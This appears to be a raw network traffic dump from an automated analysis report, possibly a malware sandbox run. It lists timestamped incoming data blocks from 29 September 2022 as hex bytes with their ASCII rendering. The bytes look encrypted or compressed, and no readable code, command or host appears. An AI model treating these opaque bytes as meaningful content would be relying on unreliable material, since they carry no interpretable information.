                                                                                                                                                2022-09-29 12:51:24 UTC1193INData Raw: 77 40 ae 70 db fc a9 f2 4d 66 58 c8 8e a6 06 ef 3c e8 40 61 45 4a d3 55 6c 06 87 de 09 27 71 80 ee ef 1f 72 d7 1f 02 9a d0 ca 1f e9 7e 8a 8a d0 69 37 66 2b bd d3 79 0a 28 47 98 d7 d4 dc a2 6c 48 05 85 06 93 42 03 e6 a2 99 fa 96 f8 39 c2 cf 91 b5 35 54 20 f5 7f f3 03 87 b1 48 88 f7 f3 87 54 a1 71 fc e8 3d 51 1e d5 87 c8 b9 06 6b c6 9c 04 89 45 75 b7 b9 b8 b8 20 cf a2 1a 78 13 47 bf ec d1 b5 ed d8 a3 3f 7a a5 8b 1c 3f 69 92 69 5b 97 7f 49 67 ba b3 2c 33 68 0b 30 b8 fc b1 f3 ac 98 12 c9 05 54 ae 4a 8c e0 84 9c 5d 78 68 1e 63 0e 32 fb 90 4e 81 c0 d9 d8 66 e6 78 bb d5 b5 8a 58 50 8a 48 32 bd 25 e7 a3 0b 58 29 65 ed 02 5d 53 79 0a 0b 49 bf 5d 01 79 c7 41 f3 76 78 ec bd 62 6b 0e 06 ef 76 cb 67 14 4a 96 b8 8d 37 c2 09 cc 5f 6f 32 8e fb 5e 33 e7 00 21 a3 a2 20 e5
                                                                                                                                                Data Ascii: w@pMfX<@aEJUl'qr~i7f+y(GlHB95T HTq=QkEu xG?z?ii[Ig,3h0TJ]xhc2NfxXPH2%X)e]SyI]yAvxbkvgJ7_o2^3!
                                                                                                                                                2022-09-29 12:51:24 UTC1195INData Raw: 05 a5 75 16 71 88 7f fb 06 ca 60 ae 74 34 65 f6 7b ab 2c 1d 19 ab 91 9c d6 5e 4a 3e f7 ed 34 e2 90 4e 8b fe f2 d3 1d cd c9 b9 3e cb f5 21 4f 77 e2 70 2e 6d 09 50 fb d2 f1 2e f9 f8 a8 70 c9 0f a8 a2 c6 b1 6d f2 d8 ad 01 59 13 4e 95 d6 1e 31 cc bd 2d 44 a8 4c 78 a3 73 87 6a fc dd 4f cb 61 fb 07 73 7c e6 09 ed 28 77 42 ff c0 b3 88 80 b6 5e d0 c1 cf af 6b d8 05 e3 a6 38 8f c0 51 bd 90 be 90 72 bc 14 6e 4e 10 3a c4 ca 79 73 33 44 97 b1 ac b9 31 ae 3e e5 a4 15 22 36 de 86 89 50 49 06 11 ca ea c0 11 23 72 4c 4b 4f 5c 0a cb cd 1a 76 ee 49 24 9c 42 4e f4 4b 5b a2 c8 d1 72 26 4c ff 53 c9 d1 9b bf 43 d8 21 7a da 31 8d 68 97 ed 78 c1 cf 9e 3a 3b 80 0d 64 17 76 a3 10 a8 92 12 7e a8 fe 40 ed f0 3c 6e f4 e5 70 39 21 a9 c3 32 1e 34 50 54 68 6e f1 4d ec 7b f7 9e ae 0f a9
                                                                                                                                                Data Ascii: uq`t4e{,^J>4N>!Owp.mP.pmYN1-DLxsjOas|(wB^k8QrnN:ys3D1>"6PI#rLKO\vI$BNK[r&LSC!z1hx:;dv~@<np9!24PThnM{
                                                                                                                                                2022-09-29 12:51:24 UTC1196INData Raw: ba 8f 38 62 51 a4 46 69 23 ea bd 56 15 43 98 09 b9 c1 dc 46 6a a9 90 5c 94 9c 77 2b 1b 9f 3a bf 1b 01 22 42 1b 22 ea b9 32 02 cc b4 11 54 4f 09 df 30 53 2b 4b 41 0f 5f ca b3 0f e7 23 ab ad 0a 41 c0 b5 dd c1 d8 83 ac bc cd 27 d0 ec 95 f7 b6 b4 ff 16 53 a7 9e f9 d7 0d d4 c5 70 9c d5 33 bc dc 7f 1c 9d 21 eb eb 93 dd 1b b1 fe 89 98 dd f1 d8 60 23 49 ff 25 c6 ef 65 b8 f0 85 04 f5 4e b4 38 bb 85 5a 01 61 c0 36 c5 04 da 25 26 dc d2 4c ba ff 1c 30 5c 62 a0 07 80 c6 97 46 6a 02 14 0a 49 41 ea 62 3e 3c 70 ba 2f fa 3f 44 8c 12 66 66 87 d7 47 97 7f 6b 68 19 5a 90 80 20 20 bf 0f 57 b2 c9 c0 9e 02 30 28 01 13 63 ee 89 22 b8 5f 8d 18 94 eb d4 2d c7 ee da 96 8b b3 66 8d 43 f7 31 87 ae d4 e8 74 6c 65 e9 07 32 43 a6 91 02 6a 06 c1 93 52 9c 77 ea 00 53 e3 a0 6e fb 18 a6 4c
                                                                                                                                                Data Ascii: 8bQFi#VCFj\w+:"B"2TO0S+KA_#A'Sp3!`#I%eN8Za6%&L0\bFjIAb><p/?DffGkhZ W0(c"_-fC1tle2CjRwSnL
                                                                                                                                                2022-09-29 12:51:24 UTC1197INData Raw: e7 87 3e d5 3b 5f de 41 c5 d4 bf c7 cd ce c5 b8 3f de 73 d3 a9 e6 6f 89 24 fa 27 71 bc ee 12 ac ff f8 0d 52 eb c4 e4 81 70 a7 1e d3 5c 2b 85 c9 a9 84 17 37 39 e9 b6 7b 9e 43 bc 3e 4c f6 13 03 b7 af af f0 68 5b 22 34 9a 20 a2 ff 2b 16 45 65 d5 e2 8d 94 0f 45 02 19 3d ed 11 54 91 80 af 37 74 47 42 36 d4 4b f8 16 58 46 b2 6e 89 e5 59 94 da e9 58 3e 8e e2 c6 03 a1 5b 27 58 11 5c 3e 8a bb 22 67 9d 9f 03 42 22 54 36 72 5c 3a 82 c1 10 22 6f ed d4 c5 cb ba fa 39 f4 c9 2e 59 99 48 8e 97 0a 5c a4 93 d1 41 04 24 b9 1d 04 eb 3a e1 f1 98 fc 8c 48 8a 8a 73 57 e8 76 99 ed 9d 0f ef 60 16 9e a3 35 65 89 13 08 df 20 7e 23 c2 36 39 19 7f d2 e8 33 6c 26 23 fe 09 50 0b 33 ae f1 37 b2 5a 9d 47 c1 c6 2a b9 3b 54 2a 64 55 31 1b f1 4c 0c 00 0f ea 2f 9b 46 f9 99 5e 56 70 e3 da 8a
                                                                                                                                                Data Ascii: >;_A?so$'qRp\+79{C>Lh["4 +EeE=T7tGB6KXFnYX>['X\>"gB"T6r\:"o9.YH\A$:HsWv`5e ~#693l&#P37ZG*;T*dU1L/F^Vp
                                                                                                                                                2022-09-29 12:51:24 UTC1198INData Raw: 26 e7 c2 81 32 b2 96 c1 5c 83 32 f9 d3 13 1c 80 e6 13 32 59 ee d1 31 dd 01 2a 0a f0 74 ae 04 70 cb 2d 41 a8 19 ef c8 00 02 a4 cd 09 9c 78 47 bb 30 f1 91 ca 02 56 16 f7 58 19 7f 78 f1 17 28 14 18 83 e3 04 63 38 aa 6e 67 cd 26 2f b5 b8 84 78 8f 9a c7 ac 62 ce fe 8f aa 51 b2 3e f5 03 d0 e3 28 a5 f9 e1 94 94 33 d6 76 e1 80 ce 2d 90 a1 d9 bc 14 b1 00 56 6b 48 61 1c 32 7f 90 41 a7 ec bd 68 ec bf c5 6c fc 8b 61 c8 7f 7b 52 05 fd 34 a0 30 90 ed 54 29 32 d6 0f 1f 35 94 3e 77 0e 90 3f c4 d7 78 22 7a ba 72 a3 01 fe b3 9b b0 57 9e 25 1b 20 fd de 71 e2 ae 55 c3 f6 76 25 08 c4 a0 5d 9f bb eb e7 53 e8 95 dc 2a 0f 46 48 7a 68 82 6b 96 eb 8b a0 10 17 3b 16 85 21 14 58 55 49 93 9a 50 b3 e8 23 6b ec fb d6 df 17 aa 12 8b 07 89 68 fb 43 4f b7 77 80 75 e2 c4 2f 07 50 f6 a2 9b
                                                                                                                                                Data Ascii: &2\22Y1*tp-AxG0VXx(c8ng&/xbQ>(3v-VkHa2Ahla{R40T)25>w?x"zrW% qUv%]S*FHzhk;!XUIP#khCOwu/P
                                                                                                                                                2022-09-29 12:51:24 UTC1214INData Raw: c3 69 ce 87 7e b8 fb 2e f3 71 e1 cc 72 52 53 a0 4f 69 ea c6 49 1f de 61 48 43 fa ea 6b ca 93 c9 cc c0 d4 4c ed cf d5 40 cc 8a 5e 9c 2a 87 3f 20 76 80 01 aa f7 ef c2 57 a5 d1 a5 4f 02 da a1 9c 0c 2a 27 ea 2f 6d fd 11 5e f6 65 51 88 03 06 d2 f1 08 0e f7 a5 6d ae dc 6b d2 5d 8f 06 c2 4f 18 df 31 bd fe 65 08 89 e4 ae 5c c6 c3 83 93 b0 74 4b f3 0b 33 01 4f c6 e5 58 54 f1 c6 22 fe 7e b4 cc 26 fd d4 40 a2 20 ac 31 8c 90 d6 b7 22 69 8a 65 d1 d7 c3 f7 02 62 95 bc 8b 9b 06 ab 4b b1 0d a5 a0 8e 6c 7f 04 78 40 7f 65 3b e3 0c 6b f3 c2 4e 10 5f 91 8f b0 c1 e9 9b 50 b1 a6 1e 57 57 81 89 af ea 0f 2d 0b f5 e7 1f 73 3b 95 fa 70 af fd cd e7 41 ff 1e 02 ae fc 82 9b 92 c7 92 ba 00 54 90 3c 0c b9 1d df f5 48 24 c6 41 fd 2d b4 b2 d8 50 51 a0 04 e5 0c 70 65 5a 44 21 0f 60 e1 b4
                                                                                                                                                Data Ascii: i~.qrRSOiIaHCkL@^*? vWO*'/m^eQmk]O1e\tK3OXT"~&@ 1"iebKlx@e;kN_PWW-s;pAT<H$A-PQpeZD!`
                                                                                                                                                2022-09-29 12:51:24 UTC1230INData Raw: a7 eb 23 14 6c 04 46 33 b3 26 f4 19 7f 96 03 c0 17 b3 eb 99 3c 2d 70 92 d9 8c 66 ea 47 1b 34 34 ec 00 b5 9e 98 e6 e7 a5 34 14 de a4 c9 0f a0 ed 92 04 10 77 06 7b 13 2e ed f4 d6 0f e7 f5 f8 bb ab e5 0b 7f 6a 35 95 c6 0c 83 46 8d 38 d9 ea 73 63 31 31 85 b6 0b 43 ca 34 4a 3b 13 3b 54 4a 9c d7 32 5f ee 8f 35 74 7d 14 b0 28 b6 49 5b 84 ca 9a e1 ca 2b ea 05 03 7c 26 3f 6e 31 8e 9f d8 4b 69 68 e3 30 ad e7 c5 fd c1 85 15 d0 35 82 11 95 17 b6 78 3a 97 50 c6 72 73 11 7c e6 61 aa 1d 9a 8d 58 05 46 35 e0 69 60 41 21 5d e2 cc f3 15 b2 4e 87 6f 65 13 90 3e 6e c6 73 36 84 0c d3 3e 1c c2 79 24 96 b1 14 c9 50 20 97 3c d1 3d fb 96 fe da cf 8d 39 e8 5c 04 79 ac 97 fc 0f 2c 0d a0 d2 d2 93 c3 c5 e2 fe 92 d2 54 2d fe 31 4d d7 35 4a 6e d1 17 d4 ca 34 8b f5 51 b4 be 66 7a c6 e5
                                                                                                                                                Data Ascii: #lF3&<-pfG444w{.j5F8sc11C4J;;TJ2_5t}(I[+|&?n1Kih05x:Prs|aXF5i`A!]Noe>ns6>y$P <=9\y,T-1M5Jn4Qfz
                                                                                                                                                2022-09-29 12:51:24 UTC1246INData Raw: 49 df 64 a2 fe 37 9f 15 cb 44 dd f4 9d 67 88 6c c8 d2 c4 c1 17 43 93 ed 1f 16 77 3f dd 94 22 0e 56 18 fa 21 c8 dd ee 56 97 a7 92 d0 6d 43 4c 28 06 23 af 29 a8 51 36 ff 92 0f fe fd 3a 0a 3d f8 b8 3d b8 63 33 06 7e aa 85 6f 0b c3 5b 69 71 0f 28 78 f7 3d 28 c7 94 2a 63 81 59 4b 99 31 9d 3e 9e ef 56 0b 10 71 c4 b0 96 f3 36 97 a5 c5 4a 75 22 e4 da b3 14 c3 fc 90 cd 96 6b 09 b1 ec 42 da a4 0d d8 91 33 93 55 59 60 4d 82 06 6e 51 00 f0 f4 b5 6f 2f 2f a5 52 84 d7 76 7a d4 60 07 1d 6b 3a 0b 9a f1 53 5f 5e 15 ee 9e 60 bd ec 21 3e c7 ed b6 c8 5b 40 a9 4f 97 47 94 66 4b 57 1c a6 96 b3 41 2e d3 f3 b8 48 77 4c 46 a2 39 af 81 85 db 58 d2 89 52 9d b3 a5 3e f7 6a df ed 72 8e 75 99 14 2e 7b 09 df cc d6 17 75 97 63 88 50 27 37 b1 c1 f3 20 6d e6 bb e4 b0 5d b1 4f 0f c8 94 13
                                                                                                                                                Data Ascii: Id7DglCw?"V!VmCL(#)Q6:==c3~o[iq(x=(*cYK1>Vq6Ju"kB3UY`MnQo//Rvz`k:S_^`!>[@OGfKWA.HwLF9XR>jru.{ucP'7 m]O
                                                                                                                                                2022-09-29 12:51:24 UTC1262INData Raw: 3d 12 44 63 89 68 92 40 e3 e7 c4 b5 5a f5 fc 7e 03 fc 4f 73 28 eb 43 0c e8 6e d8 aa fb b9 62 ae e9 cc 14 b0 d6 c7 25 c9 13 aa eb 77 5e cc c4 78 72 5f 39 f9 4d e4 03 57 37 05 2d d3 a6 6e cb 64 cf fa da 5c f2 5e 98 49 84 cc 85 f8 cc 4d 00 e8 96 b2 7d 28 df ed 00 22 4c a2 31 e4 1c 39 15 0e 34 65 41 21 57 05 6b 19 c9 32 36 c1 3e f5 22 8b b8 4c 9c 9c dc 20 65 14 6f 8a 27 63 67 79 25 e1 4a f8 ef 1d b3 15 85 bf 5c ed 56 83 da 45 4a df f4 5a 17 9c 47 ad 4e 6c 0e 17 e6 47 60 13 5e 8a 0f 13 b9 b0 42 7b 9f 05 6a 38 53 d5 c3 99 60 34 bb 19 35 4b 7c 11 8b a9 70 4a 13 e8 ec 75 49 8c 2a c7 6b 38 33 c1 b7 e7 b7 a3 64 f8 00 c7 4f b6 d6 08 f8 ef fd 2f a9 11 64 02 b6 39 60 fc 95 7a 07 c2 c3 fe e7 1a b1 bc 86 9a ed 34 aa aa e0 ae ba 68 2c 51 83 9f e1 20 dc 6e b9 fa 8c ab b5
                                                                                                                                                Data Ascii: =Dch@Z~Os(Cnb%w^xr_9MW7-nd\^IM}("L194eA!Wk26>"L eo'cgy%J\VEJZGNlG`^B{j8S`45K|pJuI*k83dO/d9`z4h,Q n
                                                                                                                                                2022-09-29 12:51:24 UTC1278INData Raw: e1 18 88 0a d4 00 02 da 63 1f 44 f8 90 a0 f2 12 00 73 4b fe aa ed 09 11 3f 2b e2 a4 cf 43 70 6f 2d ba 08 e3 12 79 cd 65 1d c5 e6 c6 49 a1 0e b1 93 28 bb b2 1a 95 31 d3 cd c8 e8 79 17 d8 13 32 65 d2 37 0f ee 2d c8 92 ca c6 c6 ef ae 66 a7 1b 21 c1 6c 34 84 0a 7b 92 4f 9b 15 80 26 d5 2d 68 7a 72 5e e0 c1 0f f1 95 91 fe be ab 0e 2a 13 48 e8 23 5d 51 ad e7 91 fc 30 47 ca a1 17 4d 25 90 59 0e 51 2c 6a 06 d5 eb a5 aa 77 55 e9 f5 6b 48 4d 97 4d 80 e9 8c a1 be 2b 55 05 6f 2d 60 18 85 e2 1a 1b 98 e0 4b 78 6e 4b 15 bd 91 8b 5e 79 b1 00 ca e3 d4 cd 57 bd 63 81 d3 1f 6a f1 2e de b0 6c 03 1f 39 02 29 b0 c4 3f 56 31 d4 6a 88 98 2b 58 6b ad a7 e0 5e 71 ab ee 52 94 d3 cc cd 73 63 87 c9 d9 ad cb db 8d 6a 5e f6 0c cc 01 0f a5 41 d9 7e 37 fe 6a 36 ae f0 4b 0c 23 3a 5e eb 44
                                                                                                                                                Data Ascii: cDsK?+Cpo-yeI(1y2e7-f!l4{O&-hzr^*H#]Q0GM%YQ,jwUkHMM+Uo-`KxnK^yWcj.l9)?V1j+Xk^qRscj^A~7j6K#:^D
                                                                                                                                                2022-09-29 12:51:24 UTC1294INData Raw: 44 80 ff f9 a2 d2 be d8 7f 0a 01 6f 0c 0c 4d 69 7e 3a 92 8c ed 83 5e 58 aa e6 6b 77 ad e9 dd b0 fe c7 2c b4 4b 64 5a 6b a2 84 07 ef e6 ab 7c 34 20 b6 df d1 5a 3e 19 a4 80 0e 64 3b b8 70 ce 58 78 35 38 c0 2b e8 3f 11 fb cd 8b 2c ba b1 7e 61 20 40 7f 74 00 b9 f0 97 e8 c2 ec dd 83 d0 99 70 0f 01 65 aa 50 f4 1a 49 e1 df 71 58 af 46 14 69 07 5d 34 9b a8 b4 8b 94 14 86 97 41 79 60 30 f5 ae ad 7c 6f 07 5f 31 9b d0 ac ca aa 6b c9 29 fd 3f 4b 87 e7 5b 20 c3 42 d3 b1 21 bb ca 28 39 cb da b8 68 b8 35 a8 72 ab 91 f2 bc 25 d5 76 3a 89 0a d8 18 8f 85 df 0a ee 7f c0 47 c2 61 c3 91 c1 13 18 96 8f cb ff dc cf e2 be cf 29 3b 6a 42 90 e0 d9 83 3a 20 93 cb 34 ef 32 07 65 5c be c4 ae f7 9f 42 10 e3 f3 e7 e4 a9 28 f5 47 7f 92 62 aa 63 d2 9f 7a 5a 4b fc aa f6 09 2c 17 1b 16 18
                                                                                                                                                Data Ascii: DoMi~:^Xkw,KdZk|4 Z>d;pXx58+?,~a @tpePIqXFi]4Ay`0|o_1k)?K[ B!(9h5r%v:Ga);jB: 42e\B(GbczZK,
                                                                                                                                                2022-09-29 12:51:24 UTC1310INData Raw: 5b 26 42 05 b6 31 83 00 8e 83 a2 23 3a 0f ed d3 77 4a b1 ff d7 48 9f 78 1c f3 96 23 21 23 b6 ae 45 43 a8 2b d1 e1 51 22 85 26 f8 1f e8 a4 29 74 d9 e2 f8 5e 82 5e cb e6 cd ee 00 cb e8 c9 9e 7a 02 77 34 74 bb 79 72 e7 f8 69 2c 47 95 1b b6 dd f1 17 2c 3e 83 8e 2b ac a0 50 a7 ef 02 0b e3 65 1e 1e 76 27 5f 8d 32 e2 1b 1d 01 20 cc 90 e6 7c dd a3 35 ba 8b 9f 67 1d 65 01 fa c5 19 20 c7 63 43 08 c6 8d 6e 0c 28 57 d0 19 8e 59 ea 44 1b d6 82 5b 51 c9 1d b7 b5 49 93 77 6a 4d 47 96 15 a9 6e 14 f1 17 7d 15 02 39 d7 87 fd c7 bc 77 31 0e 93 aa a5 6f 91 1a 66 f4 8f 3c 45 3e 6f 22 d5 80 6f 09 e9 b2 9c 83 70 7e 71 dd 40 5b 52 e1 4c 5d ea dc 4a 41 19 0e 2e e7 03 a9 1c 37 0a 08 71 01 6e 5d 11 4c 68 74 f3 0f da cd fa 7c f2 c7 52 1d 4c 75 dc 9d 4f 5e 11 d0 c0 64 cf 1b 09 76 44
                                                                                                                                                Data Ascii: [&B1#:wJHx#!#EC+Q"&)t^^zw4tyri,G,>+Pev'_2 |5ge cCn(WYD[QIwjMGn}9w1of<E>o"op~q@[RL]JA.7qn]Lht|RLuO^dvD
                                                                                                                                                2022-09-29 12:51:24 UTC1326INData Raw: 7b 1f ab 19 aa ef 3e 03 71 87 df 70 8e 5e 8a 13 66 ea 8e 5e 06 37 a7 f3 9d aa fb df 24 79 33 4b 45 2e 00 07 83 57 21 43 37 9c e9 3f 4b 70 92 84 41 de b0 88 86 1b 23 b0 a3 c1 0b c9 3f 7d 89 d5 17 34 d9 b6 72 c3 44 10 f1 96 c8 62 ef dd d2 57 5c 0d a4 eb 0c 3f d8 f8 32 da ba da f0 b7 43 df 79 40 da 00 82 ec cb 57 6c 70 6c 5c ed 0e 4f 05 1a fd d8 6b 94 58 73 8b 53 f1 35 0c 80 d1 11 7c b8 29 dd a9 0d 8f 13 9c 9c 38 dd c6 ce 74 12 ca aa a1 c4 4f ef 00 22 6d a6 f4 87 3e ee 18 c7 2c 44 2d d2 e1 8f d1 0c 5c e3 c0 1d d1 23 84 10 98 9f a3 ea ec c3 ad ee fa 58 02 5c 19 67 02 1d c2 62 34 1a c4 89 cb f1 3b f9 5e 7a 2d 5f c2 bb 32 a6 56 e7 2f ac a1 27 5c f1 f6 d0 c1 6b ce 47 39 4d dc e2 1e 68 32 1d 8a 3b f9 4e b6 e3 fe e1 04 e6 e2 bf 39 4b 82 52 c1 a7 40 e7 c1 53 6c 46
                                                                                                                                                Data Ascii: {>qp^f^7$y3KE.W!C7?KpA#?}4rDbW\?2Cy@Wlpl\OkXsS5|)8tO"m>,D-\#X\gb4;^z-_2V/'\kG9Mh2;N9KR@SlF
                                                                                                                                                2022-09-29 12:51:24 UTC1342INData Raw: d0 89 bf 98 8c f7 e9 d1 db e3 e1 f7 13 e0 93 9d c6 cd b2 f7 7c 20 c6 33 d1 34 40 53 51 99 dd b4 e4 60 87 39 88 dc 4e cd e8 ec de ed 89 8d 16 40 d3 86 86 b1 54 0d 0f c2 a2 f7 bb 37 0c 36 9a 3d 0b 01 22 ee e8 0f 45 e5 64 a0 98 16 fa bb d1 0b 08 86 5c b7 d9 33 df f5 4c 41 ff 7a 6d 12 a5 05 8b 6c 03 7d c5 2e 2e 01 16 be 30 97 2a 0c 7f bc e8 dc d6 77 c7 ee 0f bc f6 11 86 ca 89 d6 e5 ba c3 a7 f0 ae c8 ed 0d 4f 8a 4e f9 bb 8c 7d a7 f4 cf 24 b1 da c7 22 d2 bf d5 56 66 7b fd 51 18 6f 38 b0 f8 dc a1 8a 14 50 c4 d9 3b f6 4b 7d 30 ab 4a 11 1a c0 d6 bd 42 5a 6f ce 76 6c ed b4 a4 05 0d fa b1 e5 14 e6 a8 4a 5e f7 d0 83 06 af 65 7d de c8 fb 06 f4 d9 6e 84 62 d7 57 b0 29 0d ba 3c da 66 b0 bb 28 b0 f9 a7 ca 61 69 74 2e 59 10 cf a8 7a 09 f4 7b 2c ba 8e 7a 89 e7 0c 57 cc ac
                                                                                                                                                Data Ascii: | 34@SQ`9N@T76="Ed\3LAzml}..0*wON}$"Vf{Qo8P;K}0JBZovlJ^e}nbW)<f(ait.Yz{,zW
                                                                                                                                                2022-09-29 12:51:24 UTC1358INData Raw: cc 81 b4 9b 43 db 9e 63 59 e1 33 42 3e 65 81 6b 45 42 67 ff 6b 64 aa b8 67 a3 d2 ec 9d 01 14 64 98 60 f5 58 80 fa c1 2d d5 a1 d5 46 fa cb 03 8e 17 41 03 73 7c 06 2b d8 9f d5 86 f1 43 6d 90 f2 e7 39 1f af 25 9d de 88 5a 8c 89 83 3e 18 da 2d 99 69 3c b5 ea 70 de 8f 67 a1 b4 bd 05 c9 ff 2a 1c 45 eb 9c dd 8d 00 6e 52 5c cb 18 16 d5 78 dc c2 a4 4d c1 a2 3c 9a 0e 09 9a a8 c7 51 4c e3 0a 7f 6e cf 5c 46 13 55 5d d8 6b 0c e6 ec a7 ab 6b 72 7a a8 62 67 da 19 7b 79 20 e0 e6 00 1d a3 a7 88 02 67 78 bd eb ea 36 fe 57 e6 d9 bc f2 37 31 8c b1 00 4f 25 01 4a ea 28 91 3c 8b e7 09 c4 f4 84 34 60 0f 47 87 60 10 a0 b8 f3 dd 40 e7 ab 45 dc cc c0 f1 6f 2b af f4 3f 7c 69 21 48 5a 4b 6a 5b dd 88 75 59 2b e1 ce ef ae 34 51 74 1e 84 af 17 1e f8 70 13 ba bc a7 2a 2c 60 4a d7 7f 0d
                                                                                                                                                Data Ascii: CcY3B>ekEBgkdgd`X-FAs|+Cm9%Z>-i<pg*EnR\xM<QLn\FU]kkrzbg{y gx6W71O%J(<4`G`@Eo+?|i!HZKj[uY+4Qtp*,`J
                                                                                                                                                2022-09-29 12:51:24 UTC1374INData Raw: 13 f6 81 64 c6 48 2e d7 97 72 a9 c5 f4 28 9f 52 29 10 c1 77 86 98 1b 6a 54 eb 36 0d a0 58 96 d5 f1 d1 63 db fa bc 60 f7 8c b8 ba 68 b4 a0 63 e8 74 81 bb e5 a2 2c e9 ee 45 25 df 16 b2 c0 b2 58 4f 78 ae 05 92 a5 32 f3 bf 77 18 5d 9a e3 b9 0f fc 67 c8 a6 85 80 4d ae 66 7e 06 80 9d ce 27 7b 96 06 04 da 52 99 67 2f be 42 0f 97 1a 01 eb 58 a6 ba af c4 8f 88 51 a1 27 98 f7 8f 25 2f 95 01 64 df 3b 4e ca 66 85 85 ff e6 ca d2 20 d7 00 80 0b 9e fc de da 2a ca 17 87 f0 ac ab f3 66 55 c1 1e 79 dd 7c be 9b 1a 3b 36 f9 f9 c6 46 df 29 fc 47 43 b6 85 2b 49 86 79 9e 11 c8 c3 4e 26 47 a8 73 9d 2b 6a ed 70 fc 16 d0 5d 2f fc 7e b3 82 e2 2a a3 0f 15 7a 8f 19 5d db 74 55 29 b5 1e f0 7b c4 7a 09 8b 80 f3 ef ca fd 02 6d 3d 97 f7 bb 19 a6 64 74 f6 15 f2 9e 77 a0 eb d5 c1 03 bf 72
                                                                                                                                                Data Ascii: dH.r(R)wjT6Xc`hct,E%XOx2w]gMf~'{Rg/BXQ'%/d;Nf *fUy|;6F)GC+IyN&Gs+jp]/~*z]tU){zm=dtwr
                                                                                                                                                2022-09-29 12:51:24 UTC1390INData Raw: 71 fc d1 6a 31 03 fd 51 54 99 77 1b 87 0b 76 ba 23 ea ce 14 43 5b 0c 47 ff bb 5e c5 c4 20 1f 46 e5 29 7e fa a1 1b 76 7f bf 8f b7 c9 54 b5 9e f7 ea 74 81 3b e0 00 3f 29 5b 06 f5 8f c6 12 50 46 93 88 4e a9 06 db 0b 22 82 0c 78 6f a5 1e e6 fe 37 a0 77 a7 d2 ad 42 5a 85 4d 42 a6 aa 0d 43 26 ea e5 93 e2 8c 48 58 56 af be f8 7c af 87 66 c8 66 ec c9 1f b0 ac 48 c4 ef b7 38 41 ba 18 43 ff 0b 42 34 2b 96 5a 13 33 78 7e 17 4e 55 a2 7b d8 17 b6 e2 4a 4e cf 40 1e 35 96 6c 75 ca 6d ae 64 fe 75 5e 37 c6 c9 ac d0 74 a8 5e a7 3b 66 d3 ad d3 0e 3b 11 11 1d 6e 7a 0b bd 03 57 2b a4 20 ee ba 0a c1 ff f2 4e 97 d5 52 35 80 12 15 82 4e 3b 75 8e 4c 3b c3 98 1f 76 03 ef 55 42 a9 b3 d2 62 d7 b0 74 2a 2e fd 48 25 c3 ef 62 eb e7 c8 82 f7 1f ed 75 17 0f d3 ea 88 b6 93 ff 23 60 53 f5
                                                                                                                                                Data Ascii: qj1QTwv#C[G^ F)~vTt;?)[PFN"xo7wBZMBC&HXV|ffH8ACB4+Z3x~NU{JN@5lumdu^7t^;f;nzW+ NR5N;uL;vUBbt*.H%bu#`S
                                                                                                                                                2022-09-29 12:51:24 UTC1406INData Raw: f7 c1 fc 94 d6 b7 25 80 dd 8c 3d 40 a9 74 93 d3 6b a3 aa 1a 93 62 13 f8 2d 69 6e a5 ff 60 2b a9 38 9d 90 25 0d 2e ab ca f0 30 7a 5a 3a a9 89 df 40 46 88 39 55 21 4e e7 d3 f3 26 26 2c ff d3 3b 55 37 ef 2b 7f ac e9 5d d3 7d 5b f4 77 54 1f 18 0b 75 13 fd 92 e5 da 25 81 9a 21 8c d6 4f b3 1a bb 65 72 79 e5 6f d7 a7 73 10 5f 2f 0c 17 37 9b d7 7d 6c c2 db f1 6f 7f 94 99 c3 a7 20 eb a1 73 d8 95 d0 b0 7e 57 c0 52 00 2f 16 c4 1b 32 06 1f a0 c9 3b 0e 9d 77 0f cd ae 0c 43 cb 35 b7 19 24 b5 1f 4a bb 0b 84 b6 b5 0c a3 bb a1 15 a1 43 ff f2 05 29 3b ef 7c 33 a5 82 1f d3 a9 ac 36 12 d9 bd c9 44 47 68 d6 84 99 a1 99 f9 5a d4 17 62 ab 80 27 84 bc 6e d8 0a 82 ce f5 1c 0a 6b e1 32 ca 09 81 f9 fe 94 a4 25 cd 01 49 41 96 90 88 51 22 bc 4c af ac 84 54 f1 c0 23 f7 93 76 ae c3 5c
                                                                                                                                                Data Ascii: %=@tkb-in`+8%.0zZ:@F9U!N&&,;U7+]}[wTu%!Oeryos_/7}lo s~WR/2;wC5$JC);|36DGhZb'nk2%IAQ"LT#v\
                                                                                                                                                2022-09-29 12:51:24 UTC1422INData Raw: 06 4c f5 e5 1c 64 f3 82 27 c0 6e ea 89 72 ee 2e 6b 41 75 ed 38 ba fc e8 fa 78 fe da d1 44 eb 1e 98 50 5c 27 ce f4 88 55 6e 68 28 01 65 d1 ce c8 82 57 86 fa bc 3b a5 52 d7 2d a1 46 62 dd 45 6a 1a 96 07 ec c3 47 fb 27 79 7a 43 3a 01 ea a5 88 70 db 24 97 bf f0 ea e9 33 f1 bb 9c a3 01 ee 5d d9 6b 27 e7 74 f4 f0 00 4e dd de eb 2b 70 09 4f ca 4b fd 30 14 2a 47 50 5d 78 dc b5 36 b1 db c3 6e 03 42 f2 95 93 fa d2 d0 b5 16 54 80 83 c1 40 eb 8a f8 31 31 8c b1 60 42 37 2a b5 60 14 e7 ef ea 14 3f 26 b0 a4 87 8f 74 9c 5a d0 cb 2a 44 fb b6 aa 5a 9a 3f b1 c1 37 db b0 0d 2a 49 42 55 fb 06 a8 cf 37 4b e2 73 cf 6b c9 dc b2 a7 77 69 ee d6 31 9a 4a c4 e0 58 8c d6 d4 73 a5 c5 2e 8b 48 8b 62 ff b8 15 50 11 7e 2c 50 8a 06 61 06 17 7b d9 50 6c df 3f 59 70 de c9 48 c7 8f 48 44 b1
                                                                                                                                                Data Ascii: Ld'nr.kAu8xDP\'Unh(eW;R-FbEjG'yzC:p$3]k'tN+pOK0*GP]x6nBT@11`B7*`?&tZ*DZ?7*IBU7Kskwi1JXs.HbP~,Pa{Pl?YpHHD
